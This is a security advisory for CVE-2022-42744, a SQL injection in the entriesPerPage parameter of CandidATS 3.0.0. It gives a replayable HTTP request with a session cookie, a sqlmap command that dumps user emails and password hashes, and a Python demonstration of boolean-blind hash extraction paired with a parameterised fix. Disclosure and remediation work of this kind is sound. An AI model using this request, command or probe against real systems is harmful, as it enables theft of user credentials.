CandidATS 3.0.0 - SQLi via entriesPerPage
Summary
| Name | CandidATS 3.0.0 - SQLi via entriesPerPage |
| Code name | |
| Product | CandidATS |
| Affected versions | Version 3.0.0 |
| State | Public |
| Release date | 2022-10-25 |
Vulnerability
| Kind | SQL injection |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CVSSv3.1 Base Score | 8.8 |
| Exploit available | Yes |
| CVE ID(s) | CVE-2022-42744 |
Description
CandidATS version 3.0.0 allows a remote attacker to perform CRUD operations on the application database. This is possible because the application neither validates nor parameterizes the entriesPerPage parameter before using it in a SQL query, so it is injectable.
Vulnerability
The SQLi present in CandidATS 3.0.0 allows a remote attacker with a valid session to perform CRUD operations on the application database (the request below carries a CATS session cookie, matching PR:L in the CVSS vector). To trigger this vulnerability, a malicious SQL fragment is sent in the entriesPerPage parameter of the getPipelineJobOrder AJAX endpoint.
Exploitation
In this attack we obtain the user records containing the emails and password hashes of the application users. To achieve this we need three things: the captured request, the sqlmap command, and the resulting dump.
candidATS.req
The request to the vulnerable endpoint, saved to a file so sqlmap can replay it:
```http
GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/2
Host: demo.candidats.net
Cookie: CATS=1eiuqu2acq6t6tcguhcof52eha
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
```
SqlMap Command
By executing this command we obtain the records of interest. `-r` replays the saved request, `-p entriesPerPage` restricts testing to the injectable parameter, and `-D`/`-T`/`-C` select the database (here the name used by the demo instance), the table and the columns to dump:
```bash
sqlmap -r candidATS.req -p entriesPerPage -D prfkvqsyht -T user -C email,password --dump
```
Dump DB
The resulting dump confirms that the user table's email and password columns can be read from the database, i.e. that user records are compromised.
Our security policy
We have reserved the CVE-2022-42744 to refer to this issue from now on.
System Information
- Version: CandidATS 3.0.0
- Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability (as of the public disclosure date, 2022-10-25).
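The following is an added example, not CandidATS code and not Fluid Attacks' exploit. It assumes the bug class the advisory describes (a page-size value interpolated into a LIMIT clause, which the parameter name suggests) and shows, against a constructed SQLite schema that runs offline, how a boolean-blind probe in entriesPerPage can read the password column one character at a time, next to the input handling that closes the hole: parse the value as a bounded integer and bind it. The table names, rows, hash value and the probe payload are all assumptions made for illustration; which expressions a LIMIT clause accepts depends on the SQL dialect, so the exact probe against the real backend differs from this one.

```python
import sqlite3


# Constructed sample schema and rows (not CandidATS's real schema): a user
# table and a pipeline table keyed by job order, so the block runs offline.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user (user_id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'admin@example.test', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE candidate_joborder (candidate_id INTEGER, joborder_id INTEGER);
    """)
    con.executemany("INSERT INTO candidate_joborder VALUES (?, 50)",
                    [(i,) for i in range(1, 21)])
    con.commit()
    return con


def pipeline_vulnerable(con, joborder_id, entries_per_page):
    """Assumed bug class: entriesPerPage is pasted into the LIMIT clause.

    joborder_id is bound as a parameter, so the only injection point is the
    page-size value, mirroring what the advisory reports for entriesPerPage.
    """
    sql = ("SELECT candidate_id FROM candidate_joborder "
           f"WHERE joborder_id = ? LIMIT {entries_per_page}")
    return [row[0] for row in con.execute(sql, (joborder_id,))]


def parse_entries_per_page(value, default=15, maximum=100):
    """Hardened input handling: accept only a bounded ASCII decimal integer."""
    if not isinstance(value, str) or not value.isascii() or not value.isdigit():
        return default
    n = int(value)
    return n if 1 <= n <= maximum else default


def pipeline_fixed(con, joborder_id, entries_per_page):
    """Page size is validated and then bound as a parameter, never interpolated."""
    sql = ("SELECT candidate_id FROM candidate_joborder "
           "WHERE joborder_id = ? LIMIT ?")
    n = parse_entries_per_page(entries_per_page)
    return [row[0] for row in con.execute(sql, (joborder_id, n))]


def oracle_payload(position, char):
    """Hypothetical boolean-blind probe that fits in the LIMIT position.

    Evaluates to 1 when the guessed character of the first user's stored
    password hash is right (one row comes back) and to 0 otherwise (no rows).
    """
    return (f"(SELECT CASE WHEN substr((SELECT password FROM user WHERE user_id = 1),"
            f" {position}, 1) = '{char}' THEN 1 ELSE 0 END)")


def extract_password_hash(con, length=32, alphabet="0123456789abcdef"):
    """Recover the stored hash one character at a time through the oracle."""
    recovered = ""
    for position in range(1, length + 1):
        for ch in alphabet:
            if pipeline_vulnerable(con, 50, oracle_payload(position, ch)):
                recovered += ch
                break
        else:
            break  # no character matched: stop instead of looping forever
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable path leaks:", extract_password_hash(db))
    print("fixed path rows for the same payload:",
          len(pipeline_fixed(db, 50, oracle_payload(1, "5"))))
```

The fixed path never sees the probe: anything that is not a bounded decimal integer falls back to the default page size, and the value that survives is bound with a placeholder rather than concatenated, which is the pattern to apply to every pagination and sorting parameter of the endpoint, not only entriesPerPage.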
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://candidats.net/
Timeline
- 2022-10-07: Vulnerability discovered.
- 2022-10-07: Vendor contacted.
- 2022-10-07: Vendor replied acknowledging the report.
- 2022-10-07: Vendor confirmed the vulnerability.
- 2022-10-25: Public disclosure.